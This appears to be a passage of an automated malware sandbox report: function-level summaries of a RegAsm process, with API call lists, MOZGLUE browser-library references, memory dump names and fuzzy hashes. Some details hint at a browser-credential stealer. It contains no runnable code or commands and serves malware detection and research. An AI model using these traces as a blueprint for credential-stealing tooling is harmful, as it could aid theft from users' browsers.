                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C71B58D,?,?,?,?,?,?,?,6C74D734,?,?,?,6C74D734), ref: 6C728E6E
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C71B58D,?,?,?,?,?,?,?,6C74D734,?,?,?,6C74D734), ref: 6C728EBF
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,6C71B58D,?,?,?,?,?,?,?,6C74D734,?,?,?), ref: 6C728F24
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C71B58D,?,?,?,?,?,?,?,6C74D734,?,?,?,6C74D734), ref: 6C728F46
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,6C71B58D,?,?,?,?,?,?,?,6C74D734,?,?,?), ref: 6C728F7A
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C71B58D,?,?,?,?,?,?,?,6C74D734,?,?,?), ref: 6C728F8F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: freemalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3061335427-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C6E5FDE,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6E60F4
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6C6E5FDE,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6E6180
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,6C6E5FDE,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6E6211
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C6E5FDE,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6E6229
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,6C6E5FDE,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6E625E
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6E5FDE,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6E6271
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: freemalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3061335427-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C722620,?,?,?,6C7160AA), ref: 6C72284D
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C722620,?,?,?,6C7160AA), ref: 6C72289A
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,6C722620,?,?,?,6C7160AA), ref: 6C7228F1
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C722620,?,?,?,6C7160AA), ref: 6C722910
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000001,?,?,6C722620,?,?,?,6C7160AA), ref: 6C72293C
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6C722620,?,?,?,6C7160AA), ref: 6C72294E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: freemalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3061335427-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E784), ref: 6C6DCFF6
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E784), ref: 6C6DD026
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C6DD06C
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C6DD139
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSectionVirtual$AllocEnterFreeLeave
                                                                                                                                                                                                                                                    • String ID: MOZ_CRASH()
                                                                                                                                                                                                                                                    • API String ID: 1090480015-2608361144
                                                                                                                                                                                                                                                    • Opcode ID: 22d379b9d024473650272de7ba80041223174d675231f2c972b99b57f6c31bf3
                                                                                                                                                                                                                                                    • Instruction ID: 48584f92aadecd9df1c4a6d49fa2d52bb26ff54eebc91e31ae629e52476c7730
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22d379b9d024473650272de7ba80041223174d675231f2c972b99b57f6c31bf3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A410172B0031A4FDB14DE7C8D943AA36B0EB49714F560639E918E7784DFB5AC008BE4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C6D4E5A
                                                                                                                                                                                                                                                    • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C6D4E97
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6D4EE9
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6D4F02
                                                                                                                                                                                                                                                    • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C6D4F1E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 713647276-0
                                                                                                                                                                                                                                                    • Opcode ID: cadab34332c081b4de7524f54f1ae781209d536bb68dbc53c783900cf0de4ff0
                                                                                                                                                                                                                                                    • Instruction ID: c090e130adaad938ccfa85c1c7f3035314622e17b5e2d741bd1e96bc565e8200
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cadab34332c081b4de7524f54f1ae781209d536bb68dbc53c783900cf0de4ff0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5541E071604702AFC701CF29C8809ABBBE4FF89344F118A2DF46587650DBB0F919CB86
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 0040702B
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00407059
                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00407090
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrlenA.KERNEL32(004181A9,?,00000000,?,0041790D,004271B2,004271AF,00000000,?,00000000,004228A8,000000FF,?,004181A9), ref: 0040FD6B
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrcpy.KERNEL32(00000000,004181A9), ref: 0040FDA2
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
                                                                                                                                                                                                                                                    • String ID: @$v10
                                                                                                                                                                                                                                                    • API String ID: 1400469952-24753345
                                                                                                                                                                                                                                                    • Opcode ID: 15abc90a5468d67b038e545ba9b2a8b84e81b54b57679cb6f1875e5a9e49627f
                                                                                                                                                                                                                                                    • Instruction ID: 0c5d81fa008fb187a6581128f9bae03b46aaa069853f771c139e6e3470d7b948
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15abc90a5468d67b038e545ba9b2a8b84e81b54b57679cb6f1875e5a9e49627f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5941B071A05219ABDB10DF98DC01BEEB778AB44B10F10422EF915BB2C0DB786905CB99
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6EC1BC
                                                                                                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6EC1DC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Now@Stamp@mozilla@@TimeV12@_strlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1885715127-0
                                                                                                                                                                                                                                                    • Opcode ID: db101f913880c5a6ff7317fa045a52999da7f03fbb19040a3bcb5d64eb8c59a2
                                                                                                                                                                                                                                                    • Instruction ID: a47fa0eda45a67b0e69f8dde90ab6f4c38c83f1da26049021763e3912bbb6091
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db101f913880c5a6ff7317fa045a52999da7f03fbb19040a3bcb5d64eb8c59a2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E841C2B1D0D7409FD710DF24C584B8ABBE4BF8A308F41856EE8999B712E730D948CB96
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75F770), ref: 6C73A858
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C73A87B
                                                                                                                                                                                                                                                      • Part of subcall function 6C73A9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6C73A88F,00000000), ref: 6C73A9F1
                                                                                                                                                                                                                                                    • _ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6C73A8FF
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C73A90C
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75F770), ref: 6C73A97E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1355178011-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(-00000002,?,6C6E152B,?,?,?,?,6C6E1248,?), ref: 6C6E159C
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000023,?,?,?,?,6C6E152B,?,?,?,?,6C6E1248,?), ref: 6C6E15BC
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(-00000001,?,6C6E152B,?,?,?,?,6C6E1248,?), ref: 6C6E15E7
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,6C6E152B,?,?,?,?,6C6E1248,?), ref: 6C6E1606
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C6E152B,?,?,?,?,6C6E1248,?), ref: 6C6E1637
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 733145618-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C74E330,?,6C6FC059), ref: 6C73AD9D
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: malloc.MOZGLUE(?), ref: 6C6ECA26
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C74E330,?,6C6FC059), ref: 6C73ADAC
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,00000000,?,?,6C74E330,?,6C6FC059), ref: 6C73AE01
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,6C74E330,?,6C6FC059), ref: 6C73AE1D
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C74E330,?,6C6FC059), ref: 6C73AE3D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3161513745-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C74DCA0,?,?,?,6C70E8B5,00000000), ref: 6C735F1F
                                                                                                                                                                                                                                                    • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C70E8B5,00000000), ref: 6C735F4B
                                                                                                                                                                                                                                                    • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C70E8B5,00000000), ref: 6C735F7B
                                                                                                                                                                                                                                                    • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C70E8B5,00000000), ref: 6C735F9F
                                                                                                                                                                                                                                                    • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C70E8B5,00000000), ref: 6C735FD6
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1389714915-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 6C6DB532
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?), ref: 6C6DB55B
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6DB56B
                                                                                                                                                                                                                                                    • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C6DB57E
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C6DB58F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4244350000-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C6DB7CF
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C6DB808
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C6DB82C
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6DB840
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6DB849
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1977084945-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C736E78
                                                                                                                                                                                                                                                      • Part of subcall function 6C736A10: InitializeCriticalSection.KERNEL32(6C75F618), ref: 6C736A68
                                                                                                                                                                                                                                                      • Part of subcall function 6C736A10: GetCurrentProcess.KERNEL32 ref: 6C736A7D
                                                                                                                                                                                                                                                      • Part of subcall function 6C736A10: GetCurrentProcess.KERNEL32 ref: 6C736AA1
                                                                                                                                                                                                                                                      • Part of subcall function 6C736A10: EnterCriticalSection.KERNEL32(6C75F618), ref: 6C736AAE
                                                                                                                                                                                                                                                      • Part of subcall function 6C736A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C736AE1
                                                                                                                                                                                                                                                      • Part of subcall function 6C736A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C736B15
                                                                                                                                                                                                                                                      • Part of subcall function 6C736A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C736B65
                                                                                                                                                                                                                                                      • Part of subcall function 6C736A10: LeaveCriticalSection.KERNEL32(6C75F618,?,?), ref: 6C736B83
